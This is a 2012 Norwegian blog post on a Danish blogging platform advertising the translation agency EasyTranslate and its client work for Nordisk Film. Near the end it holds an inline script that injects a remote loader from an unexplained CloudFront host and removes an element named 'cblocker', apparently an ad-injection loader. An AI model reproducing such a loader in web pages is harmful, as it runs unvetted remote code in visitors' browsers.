Smartlog v3 » Tips, Guides & Informationer » Oversettelse
Opret egen blog | Næste blog »

Tips, Guides & Informationer

Her på bloggen kan du læse gratis tips, guides og informationer om alt mellem himmel og jord

Oversettelse

21. Aug 2012 12:09, webmayn

I stedet for å kaste bort arbeidstid på å finne de mest kvalifiserte oversetterne, kan det være nyttig å se på nøyaktig hvilke områder oversettelsesbyråene arbeider innenfor. Hos EasyTranslate tilbys et bredt utvalg av tjenester, og hovedområdene er oversettelse av hjemmesider, autoriserte oversettelser, korrektur, og desktop editing.

 

Når man har avgrenset søket til primære arbeidsområder, kan det være nyttig å se på personene bak. Ved å se på hvilke forutsetninger personene i bedriften har, kan man sikre at oversettelsene blir løst på kvalifisert vis. Med både oversettere, tolker og translatører i stallen står EasyTranslate sterkt i den store gruppen oversettelsesbyråer.

 

Dette har flere store kunder merket seg, blant annet firmaer som Q8, Nordisk Film, DHT, Statoil og Toyota, for å nevne noen.

Hver kunde har unike behov og krav, og vi tilpasser oss disse under samarbeidet med EasyTranslate. Når det gjelder Nordisk Film, har de sin egne interne oversettelsesavdeling, som de først og fremst benytter til oversettelsesoppgaver i virksomheten.

 

I blant kommer de imidlertid ut for større arbeidspress enn vanlig, og flaskehalser oppstår. Her kom EasyTranslate inn i bildet. Nordisk Film hadde behov for ekstern hjelp for å sikre en mer flytende arbeidsgang i pressede tider, og det har resultert i et langvarig samarbeid med Easy Translate, der de har fått sitt eget oversetterteam som kan oversette innenfor svært korte tidsfrister.

 

Vil du også har et kvalifisert oversetterteam i bakhånd til travle perioder? Du kan lese mer om ved å klikke her .

if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

Tags

Relaterede